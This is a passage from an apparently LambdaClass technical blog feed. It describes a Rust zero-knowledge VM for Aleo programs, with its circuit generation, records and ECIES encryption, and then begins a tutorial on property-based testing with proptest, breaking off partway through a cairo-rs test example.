&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;program foo.aleo;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;function main:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    input r0 as u64.public;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    input r1 as u64.public;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    add r0 r1 into r2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    output r2 as u64.public;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Executing the function &lt;code&gt;main&lt;&#x2F;code&gt; would look like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use lambdavm::jaleo::UserInputValueType::U16;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn main() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    use lambdavm::{build_program, execute_function};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Parse the program&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let program_string = std::fs::read_to_string(&amp;quot;.&#x2F;programs&#x2F;add&#x2F;main.aleo&amp;quot;).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (program, build) = build_program(&amp;amp;program_string).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let function = String::from(&amp;quot;main&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Declare the inputs (it is the same for public or private)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let user_inputs = vec![U16(1), U16(1)];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Execute the function&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (_execution_trace, proof) = execute_function(&amp;amp;program, &amp;amp;function, &amp;amp;user_inputs).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (_proving_key, verifying_key) = build.get(&amp;amp;function).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    assert!(lambdavm::verify_proof(verifying_key.clone(), &amp;amp;user_inputs, &amp;amp;proof).unwrap())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;internals&quot;&gt;Internals&lt;&#x2F;h3&gt;
&lt;p&gt;The most significant task our VM has to perform is turning the program into an arithmetic circuit, as the rest of the work, namely generating the proof and verifying it, is pretty straightforward with the Arkworks API.&lt;&#x2F;p&gt;
&lt;p&gt;Before continuing, you should have at least a basic understanding of arithmetic circuits and how Arkworks lets you work with them. You can read about it &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lambdaclass.github.io&#x2F;simpleworks&#x2F;overview.html&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;To generate the circuit, we go through the following steps:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Take the program’s source code and parse it into a &lt;code&gt;Program&lt;&#x2F;code&gt; containing all the relevant information about it (a list of all input and output instructions, whether they are public or private, a list of all regular instructions like &lt;code&gt;add&lt;&#x2F;code&gt; and their operands, etc.). We currently rely on SnarkVM’s parser but plan to write our own.&lt;&#x2F;li&gt;
&lt;li&gt;Instantiate an Arkworks &lt;code&gt;ConstraintSystem&lt;&#x2F;code&gt;, which will hold all our circuit’s constraints by the end.&lt;&#x2F;li&gt;
&lt;li&gt;For every input instruction, instantiate its corresponding &lt;code&gt;Gadget&lt;&#x2F;code&gt;. You can think of a gadget as the equivalent of a native type (like &lt;code&gt;u8&lt;&#x2F;code&gt;) inside an arithmetic circuit. If the input is public, the gadget is made public; otherwise, it’s made a &lt;code&gt;witness&lt;&#x2F;code&gt;, i.e., private. In our example, the first instruction &lt;code&gt;input r0 as u16.public&lt;&#x2F;code&gt; becomes a call to &lt;code&gt;UInt16Gadget.new_input(...)&lt;&#x2F;code&gt; and the second instruction becomes &lt;code&gt;UInt16Gadget.new_witness(...)&lt;&#x2F;code&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;For every regular instruction, we use the gadget’s associated function to perform the operation and generate its constraints inside our &lt;code&gt;ConstraintSystem&lt;&#x2F;code&gt;. In our example, when we encounter the &lt;code&gt;add r0 r1 into r2;&lt;&#x2F;code&gt; instruction, we call &lt;code&gt;UInt16Gadget.addmany(...)&lt;&#x2F;code&gt;, an Arkworks-provided function that takes a list of &lt;code&gt;UInt16&lt;&#x2F;code&gt;s, adds them, implicitly mutates the &lt;code&gt;ConstraintSystem&lt;&#x2F;code&gt; with all the associated constraints, and then returns the value of the sum. Not all instructions have a corresponding Arkworks function implemented, so for those we had to roll our own.&lt;&#x2F;li&gt;
&lt;li&gt;For every output instruction, assign the computed value to the register.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Because a program can have multiple registers interacting with each other, to do the above, we have to keep track of each register and its value as we go. For this, we keep an internal hash table throughout execution.&lt;&#x2F;p&gt;
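&lt;p&gt;As a toy illustration of that register table, here is a hypothetical interpreter that tracks register values in a hash table while walking the instructions (the real VM produces Arkworks gadgets and constraints at each step instead of plain values):&lt;&#x2F;p&gt;

```python
# Hypothetical miniature of the register-tracking pass: a dict maps register
# names to values while instructions are interpreted. Illustrative only.
def run(instructions, inputs):
    registers = {}
    outputs = []
    inputs = iter(inputs)
    for inst in instructions:
        parts = inst.replace(";", "").split()
        if parts[0] == "input":
            # e.g. "input r0 as u64.public" binds the next user input to r0
            registers[parts[1]] = next(inputs)
        elif parts[0] == "add":
            # e.g. "add r0 r1 into r2"
            registers[parts[4]] = registers[parts[1]] + registers[parts[2]]
        elif parts[0] == "output":
            outputs.append(registers[parts[1]])
    return outputs

program = [
    "input r0 as u64.public;",
    "input r1 as u64.public;",
    "add r0 r1 into r2;",
    "output r2 as u64.public;",
]
assert run(program, [1, 1]) == [2]
```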
&lt;p&gt;Additionally, we ran some benchmarks comparing our VM with Aleo’s &lt;code&gt;SnarkVM&lt;&#x2F;code&gt;, and our results show we are a few times faster than it; details will be published in a separate post. The code for benchmarks is in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;aleo_lambda_vm&quot;&gt;our VM Repo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;vm-consensus-integration-layer&quot;&gt;VM-Consensus Integration Layer&lt;&#x2F;h2&gt;
&lt;p&gt;Above, we discussed how the VM allows running arbitrary Aleo programs that can be deployed, executed locally, and then verified on the Aleo blockchain. Each Aleo transaction is either the deployment or the proof of execution of a program (this is technically inaccurate, as there can be multiple of these per transaction, but we’ll ignore that for simplicity). In the case of executions, nodes use the program’s verifying key to verify the correct execution before committing transactions to a block.&lt;&#x2F;p&gt;
&lt;p&gt;After we got a basic VM version working, we realized that getting a fully functional Aleo blockchain required more work than just the above. Transactions would be of very little use if all they did was prove that some computation was done correctly. To be useful, they also need to &lt;em&gt;modify the state&lt;&#x2F;em&gt;. In Aleo, the state is managed through &lt;em&gt;records&lt;&#x2F;em&gt; in what is essentially a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Unspent_transaction_output&quot;&gt;UTXO&lt;&#x2F;a&gt; model similar to Bitcoin’s. Typically, when a user sends a transaction, they spend some records they own to create new ones in their place.&lt;&#x2F;p&gt;
&lt;p&gt;Because Aleo is entirely private, a transaction can’t just publish the records it wants to spend along with a signature; it has to &lt;em&gt;prove&lt;&#x2F;em&gt; ownership and existence of the records in zero knowledge, then &lt;em&gt;encrypt&lt;&#x2F;em&gt; them so that only their owner can decrypt them on-chain.&lt;&#x2F;p&gt;
&lt;p&gt;This means that, to integrate with the consensus layer and get a fully functional blockchain, we need a bit more. The VM can prove the correct execution of programs, but the Zero-Knowledge proof that comes with a transaction also needs to include the following:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;A signature verified in zero-knowledge, i.e., a proof that the signature provided is the correct one. Remember, we can’t just reveal the address of the user sending the transaction.&lt;&#x2F;li&gt;
&lt;li&gt;A proof that the caller of the transaction actually &lt;em&gt;owns&lt;&#x2F;em&gt; the records they’re spending.&lt;&#x2F;li&gt;
&lt;li&gt;A proof that the records being spent are on-chain. This is essentially verifying a Merkle path in zero-knowledge.&lt;&#x2F;li&gt;
&lt;li&gt;A proof that the input records have not been spent. This is a bit involved, as it requires deriving a record’s &lt;code&gt;serial number&lt;&#x2F;code&gt; (think of it as the &lt;code&gt;nullifier&lt;&#x2F;code&gt; if you know ZCash) in zero-knowledge.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;We also talked about how records should be stored encrypted on-chain so that only someone possessing the record owner’s view key can decrypt them (in Aleo, the &lt;code&gt;view key&lt;&#x2F;code&gt; is just another key tied to an account that allows record decryption).&lt;&#x2F;p&gt;
&lt;p&gt;There’s a catch here, though. When, for instance, user A wants to send money to user B, they have to create a record owned by B and encrypt it so that only B can decrypt it. But A does not necessarily have B’s view key, only their address. This means the encryption scheme used by Aleo cannot be symmetric, as that would require user A to have B’s view key to send them money, not just their address.&lt;&#x2F;p&gt;
&lt;p&gt;To accomplish this, records are encrypted using a scheme called &lt;code&gt;ECIES&lt;&#x2F;code&gt; (Elliptic Curve Integrated Encryption Scheme). We’re not going to go into detail about how it works, but it’s a combination of a Diffie-Hellman key exchange with a symmetric encryption scheme.&lt;&#x2F;p&gt;
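&lt;p&gt;To make the shape of the scheme concrete, here is a deliberately toy sketch of the ECIES flow: a Diffie–Hellman exchange derives a shared secret, which then keys a symmetric cipher. It uses exponentiation modulo a small prime and XOR in place of an elliptic curve and a real cipher; none of the numbers below are Aleo’s actual parameters.&lt;&#x2F;p&gt;

```rust
// Toy ECIES-shaped flow: Diffie-Hellman over integers mod a small prime,
// then XOR as a stand-in symmetric cipher. Illustration only; real ECIES
// uses an elliptic-curve group and an authenticated cipher.

// Modular exponentiation by repeated squaring.
fn modpow(mut base: u64, mut exp: u64, p: u64) -> u64 {
    let mut acc: u64 = 1;
    base %= p;
    while exp != 0 {
        if exp % 2 == 1 {
            acc = acc * base % p;
        }
        base = base * base % p;
        exp /= 2;
    }
    acc
}

fn main() {
    let p: u64 = 2147483647; // small prime group, stand-in for a curve
    let g: u64 = 7;

    // B's long-term key pair: B publishes pk_b (the "address" analogue).
    let sk_b: u64 = 123_456;
    let pk_b = modpow(g, sk_b, p);

    // A encrypts to B knowing only pk_b: fresh ephemeral key per record.
    let eph: u64 = 987_654;
    let eph_pub = modpow(g, eph, p);
    let shared_a = modpow(pk_b, eph, p); // DH shared secret on A's side

    let record: u64 = 42; // the plaintext "record"
    let ciphertext = record ^ shared_a; // toy symmetric encryption

    // B recomputes the same secret from the ephemeral public key.
    let shared_b = modpow(eph_pub, sk_b, p);
    assert_eq!(shared_a, shared_b);
    println!("decrypted = {}", ciphertext ^ shared_b);
}
```

&lt;p&gt;In real ECIES the ephemeral public key travels alongside the ciphertext, which is exactly what lets A encrypt to B while knowing only public information.&lt;&#x2F;p&gt;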
&lt;p&gt;We introduced a middle layer between our VM and the Consensus Layer to solve all the problems discussed above. This middle layer handles everything related to records, their encryption, and the snarks required for the state transition proofs.&lt;&#x2F;p&gt;
&lt;p&gt;In the original SnarkVM implementation, this middle layer does not really exist, as it’s part of the VM itself, but we found it more beneficial to separate these two concerns.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;work-in-progress&quot;&gt;Work in Progress&lt;&#x2F;h2&gt;
&lt;p&gt;This project is still in active development, and a few things are being worked on. They include:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Support for some data types and instructions on the VM, including the &lt;code&gt;group&lt;&#x2F;code&gt; data type (elliptic curve elements) and things like &lt;code&gt;BHP&lt;&#x2F;code&gt; commitments. You can check out a complete list on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;aleo_lambda_vm&quot;&gt;the README&lt;&#x2F;a&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;Some of the circuits mentioned above that prove the correctness of state transitions.&lt;&#x2F;li&gt;
&lt;li&gt;The generation of the proof that input records exist on-chain.&lt;&#x2F;li&gt;
&lt;li&gt;Due to how we store record information on the blockchain, and given its privacy requirements, querying a user’s balance or unspent records from the CLI is currently not trivial: we need to fetch every record that has ever existed, along with the serial numbers of all spent records, and attempt to decrypt them on the user’s side. One strategy to optimize this process is to keep track of records locally and only process newly created ones as the blockchain grows.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;We plan to finish these tasks in the next four weeks. While many things could be improved, the project is already production ready.&lt;&#x2F;p&gt;
&lt;p&gt;We have many ideas and comments about improving the SnarkVM and Aleo in general, but we will leave that for another series of posts.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>What is property-based testing? Two examples in Rust</title>
          <pubDate>Fri, 03 Feb 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/what-is-property-based-testing/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/what-is-property-based-testing/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/what-is-property-based-testing/">&lt;p&gt;This article will explore property-based tests and demonstrate their use in two of our open-source projects.&lt;br &#x2F;&gt;
First, let’s explain what a property-based test (PBT) is: If a picture is worth a thousand words, a PBT is worth a thousand unit tests (although this is tunable, as we will see later).&lt;br &#x2F;&gt;
The technique was born in the functional programming community and is very different from conventional testing methods. It’s a great tool to consider when testing the correctness of our programs.&lt;&#x2F;p&gt;
&lt;p&gt;As its name suggests, it is based on testing the properties of our code: invariants or behavior that we expect to hold across inputs. When we write a unit test, we test a function&#x2F;method for a specific set of parameters, so we usually test with a representative (but small) number of inputs where we think the code may hide bugs. In contrast, a property-based test generates many random inputs and checks that the property is met for all of them. If it finds an input for which the property fails, it proceeds with a shrinking process to find the smallest input that breaks the property. That way, it is easier to reproduce the issue.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;a-first-example&quot;&gt;A First Example&lt;&#x2F;h2&gt;
&lt;p&gt;Enough talk; let us use a simple example to show how it works in practice. We’ll work with Rust to illustrate the benefits of this way of testing.&lt;&#x2F;p&gt;
&lt;p&gt;There are several libraries for doing property-based tests in Rust, but we chose &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;proptest-rs&#x2F;proptest&quot;&gt;proptest&lt;&#x2F;a&gt; because it’s straightforward to use and is being actively maintained.&lt;&#x2F;p&gt;
&lt;p&gt;In this example, we create a test for a function that adds two non-negative numbers. The test checks a property of such an addition: the result is greater than or equal to each of the individual operands. We use the &lt;code&gt;prop_assert!&lt;&#x2F;code&gt; macro to verify that the property holds.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use proptest::prelude::*;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn add(a: i32, b: i32) -&amp;gt; i32 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	a + b&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proptest! {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	&#x2F;&#x2F; Generate 1000 tests.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	#![proptest_config(ProptestConfig::with_cases(1000))]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	#[test]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	fn test_add(a in 0..1000i32, b in 0..1000i32) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		let sum = add(a, b);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		prop_assert!(sum &amp;gt;= a);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		prop_assert!(sum &amp;gt;= b);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		prop_assert_eq!(a + b, sum);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Let us see what happens if we change the first property to an incorrect one:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; prop_assert!(sum &amp;gt;= a); previous line&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;prop_assert!(sum &amp;lt;= a);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We will receive a report with the smallest instance that breaks the property.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;---- test_add stdout ----&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;thread &amp;#39;test_add&amp;#39; panicked at &amp;#39;Test failed: assertion failed: sum &amp;lt;= a at src&#x2F;lib.rs:13; minimal failing input: a = 0, b = 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        successes: 0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        local rejects: 0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        global rejects: 0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;#39;, src&#x2F;lib.rs:7:1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
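&lt;p&gt;Under the hood, the idea is simple: generate random inputs, look for one that falsifies the property, then repeatedly try smaller inputs that still fail. The following hand-rolled miniature (it is not proptest’s actual machinery, just a sketch of the generate-and-shrink loop) finds the same minimal counterexample for the broken property &lt;code&gt;sum &amp;lt;= a&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;

```rust
// A miniature of what a property-based framework does: generate random
// cases, find a failure, then shrink it toward a minimal counterexample.
// Hand-rolled illustration only, not proptest's actual machinery.

// Deterministic linear congruential generator so the run is reproducible.
fn next(state: u64) -> u64 {
    state.wrapping_mul(6364136223846793005).wrapping_add(1442695040888963407)
}

// The (deliberately wrong) property from the text: a + b should be at
// most a, which fails as soon as b is positive.
fn property(a: u32, b: u32) -> bool {
    a >= a + b
}

fn main() {
    let mut s: u64 = 42;
    let mut failing = None;
    for _ in 0..1000 {
        s = next(s);
        let a = (s % 1000) as u32;
        s = next(s);
        let b = (s % 1000) as u32;
        if !property(a, b) {
            failing = Some((a, b));
            break;
        }
    }

    // Shrink: halve each coordinate while the smaller input still fails.
    // (Real shrinkers are cleverer; a greedy pass is enough here.)
    if let Some((mut a, mut b)) = failing {
        while a != 0 {
            if property(a / 2, b) { break; }
            a /= 2;
        }
        while b / 2 != 0 {
            if property(a, b / 2) { break; }
            b /= 2;
        }
        println!("minimal failing input: a = {}, b = {}", a, b);
    }
}
```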
&lt;p&gt;To build tests for more complex structures, we can use regular expressions (if we have a way of building our data type from a string) or use &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.rs&#x2F;proptest&#x2F;latest&#x2F;proptest&#x2F;strategy&#x2F;trait.Strategy.html&quot;&gt;Strategies&lt;&#x2F;a&gt;, which are used to control how values are generated and how the shrinking process is done.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;case-studies&quot;&gt;Case studies&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;case-study-1-cairo-rs&quot;&gt;Case study 1: cairo-rs&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s start with a more practical example. At LambdaClass, we developed a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;cairo-rs&quot;&gt;Rust implementation of the Cairo virtual machine&lt;&#x2F;a&gt;. Cairo stands for CPU Algebraic Intermediate Representation. It’s a programming language for writing provable programs, where one party can prove to another that a computation was executed correctly by producing a zero-knowledge proof.&lt;&#x2F;p&gt;
&lt;p&gt;Executing a program made in Cairo involves operating with a lot of field elements (i.e., integers between 0 and a huge prime number minus one). So every operation (addition, subtraction, multiplication, and division) needs to evaluate to a felt (field element) in the range [0, PRIME - 1].&lt;&#x2F;p&gt;
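&lt;p&gt;Before looking at the real tests, the invariant itself is easy to state with plain integers. Here is a toy version that uses a small prime in place of the Cairo prime (the prime and the operands below are made up for illustration):&lt;&#x2F;p&gt;

```rust
// Toy illustration of the felt invariant: every arithmetic result must
// land back in [0, PRIME - 1]. A small prime stands in for Cairo's.
fn main() {
    let p: u64 = 65521; // small prime, NOT the real Cairo prime

    let x: u64 = 60000 % p;
    let y: u64 = 50000 % p;

    let sum = (x + y) % p;
    let prod = x * y % p;
    // Subtraction wraps into the field instead of going negative.
    let diff = (x + p - y) % p;

    // Each result divided by p is 0 exactly when it lies in [0, p - 1].
    assert_eq!(sum / p, 0);
    assert_eq!(prod / p, 0);
    assert_eq!(diff / p, 0);
    println!("all results in range: sum={} prod={} diff={}", sum, prod, diff);
}
```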
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proptest! {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  #[test]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Property-based test that ensures, for 100 felt values that are randomly generated each time tests are run, that a new felt doesn&amp;#39;t fall outside the range  [0, PRIME-1].&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; In this and some of the following tests, The value of {x} can be either [0]  or a huge number to try to overflow the value of {p} and thus ensure the modular arithmetic is working correctly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  fn new_in_range(ref x in &amp;quot;(0|[1-9][0-9]*)&amp;quot;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let x = &amp;amp;Felt::parse_bytes(x.as_bytes(), 10).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let p = &amp;amp;BigUint::parse_bytes(PRIME_STR[2..].as_bytes(), 16).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    prop_assert!(&amp;amp;x.to_biguint() &amp;lt; p);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  #[test]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Property-based test that ensures, for 100 felt values that are randomly generated each time tests are run, that the negative of a felt doesn&amp;#39;t fall outside the range [0, PRIME-1].&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  fn neg_in_range(ref x in &amp;quot;(0|[1-9][0-9]*)&amp;quot;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let x = &amp;amp;Felt::parse_bytes(x.as_bytes(), 10).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let neg = -x;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let as_uint = &amp;amp;neg.to_biguint();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let p = &amp;amp;BigUint::parse_bytes(PRIME_STR[2..].as_bytes(), 16).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    prop_assert!(as_uint &amp;lt; p);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  #[test]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
